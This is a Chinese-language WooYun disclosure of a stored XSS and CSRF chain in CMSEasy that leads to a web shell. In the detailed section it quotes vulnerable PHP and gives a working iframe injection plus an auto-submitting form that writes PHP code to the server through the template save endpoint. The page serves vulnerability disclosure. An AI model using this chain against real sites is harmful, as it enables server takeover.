cmseasy xss+csrf getshell | wooyun-2013-040347| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040347

漏洞标题：cmseasy xss+csrf getshell

漏洞作者： Chora

提交时间：2013-10-22 14:11

修复时间：2014-01-20 14:11

公开时间：2014-01-20 14:11

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-10-22：细节已通知厂商并且等待厂商处理中
2013-10-22：厂商已经确认，细节仅向厂商公开
2013-10-25：细节向第三方安全合作伙伴开放
2013-12-16：细节向核心白帽子及相关领域专家公开
2013-12-26：细节向普通白帽子公开
2014-01-05：细节向实习白帽子公开
2014-01-20：细节向公众公开

简要描述：

第一次XSS处就给了你了。

详细说明：

lib/tool/front_class.php

function __construct() {
    	if(preg_match('/(\'|")/', $_POST['username']) || preg_match('/(\'|")/', $_GET['username']) || preg_match('/(\'|")/', $_COOKIE['login_username'])){
    		exit('非法参数');
......
        
        if (!MAGIC_QUOTES_GPC) {
        	$_GET = daddslashes($_GET);
        	$_POST = daddslashes($_POST);
        	$_COOKIE = daddslashes($_COOKIE);
        } //GPC=OFF才过滤跨站代码,为ON时不过滤.
        
        $dfile = htmlspecialchars($_GET['dfile']);
        foreach ($_GET as $key=>$value) {
            unset($_GET[$key]);
            if ($key == 'host'||$key == 'ftpip'||$key == 'request'||$key == 'notify_id'||$key == 'real_name') {
                $_GET[$key]=$value;
                continue;
            }
            $key=preg_replace('/[^\w-].*/','',$key);
            if ($key == 'tag'||$key == 'keyword') {
                $value=strip_tags(urldecode($value));
                $value=str_replace(' ','+',$value);
				if(preg_match('/union/i',$value) || preg_match('/"/i',$value) ||preg_match('/\'/i',$value)){
                	exit('非法参数');
                }
            }
            else
                $value=preg_replace('/[^\w-].*/','',$value);
            $_GET[$key]=$value;
        }
        
        self::$get=$_GET;
        self::$post=$_POST; //GET过滤的比较多，POST紧紧就过滤了单双引号。
        self::$get['dfile'] = $dfile;
        ......    }

lib/default/archive_act.php

function orders_action() {
        $this->view->aid = trim(front::get('aid'));
        if (front::post('submit')) {
        	$this->orders = new orders();
        	$row = $this->orders->getrow("","adddate DESC");
        	//var_dump(time());
        	if($row['adddate'] && time() - $row['adddate'] <= intval(config::get('order_time'))){
        		alerterror('操作频繁,请稍后再试');
        		return;
        	}
            if (front::$post['telphone'] == '') {
                alerterror('联系电话为必填！');
                return;
            }
            front::$post['mid'] = $this->view->user['userid'] ? $this->view->user['userid'] : 0;
            front::$post['adddate'] = time();
            front::$post['ip'] = front::ip();
            if (isset(front::$post['aid'])) {
                $aidarr = front::$post['aid'];
                unset(front::$post['aid']);
                foreach ($aidarr as $val) {
                    front::$post['aid'].=$val . ',';
                    front::$post['pnums'].=front::$post['thisnum'][$val] . ',';
                }
            } else {
                front::$post['aid'] = $this->view->aid;
            }
            if (!isset(front::$post['logisticsid']))
                front::$post['logisticsid'] = 0;
            front::$post['oid'] = date('YmdHis') . '-' . front::$post['logisticsid'] . '-' . front::$post['mid'] . '-' . front::$post['payname'];
            
            $insert = $this->orders->rec_insert(front::$post); //没过滤就直接插入数据库了。
			......
    }

访问http://localhost/index.php?case=archive&act=orders&aid=1
在单位名称里插入跨站代码<iframe src="http://localhost/add.html" width=0 height=0>

<body onload=document.f.submit()>
<form name="f" method="post" action="http://localhost/index.php?case=template&act=save&admin_dir=admin&site=default">
<input type="hidden" name="sid" value="test.php">
<input type="hidden" name="scontent" value="<?php phpinfo(); ?>">
</form>
</body>

lib/admin/template_admin.php

function save_action() {
        $id = front::post('sid'); //文件名,sid=test.php,下面的替换都无影响
        $tpl = str_replace('_d_','/',$id);
        $tpl = str_replace('#','',$tpl);
        $tpl = str_replace('_html','.html',$tpl);
        $tpl = str_replace('_css','.css',$tpl);
        $tpl = str_replace('_js','.js',$tpl);
        $res = array();
        $content = htmlspecialchars_decode(front::post('scontent'));//要保存的内容
        $content = preg_replace('%<&#47textarea%','</textarea',$content);
        ......        
}else {
            if ($content) {
            	$content = stripslashes($content);
                file_put_contents(TEMPLATE .'/'.config::get('template_dir') .'/'.$tpl,$content); //写入。
                $res['message'] = 'ok';
            }
        }
        echo $res['message'];
        exit;
    }

访问http://localhost/template/default/test.php

漏洞证明：

第一次XSS处就给了你了。

修复方案：

版权声明：转载请注明来源 Chora@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-10-22 17:02

厂商回复：

感谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040347

漏洞标题：cmseasy xss+csrf getshell

相关厂商：cmseasy

漏洞作者： Chora

提交时间：2013-10-22 14:11

修复时间：2014-01-20 14:11

公开时间：2014-01-20 14:11

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Chora@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040347

漏洞标题：cmseasy xss+csrf getshell

相关厂商：cmseasy

漏洞作者： Chora

提交时间：2013-10-22 14:11

修复时间：2014-01-20 14:11

公开时间：2014-01-20 14:11

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-040347"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Chora@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：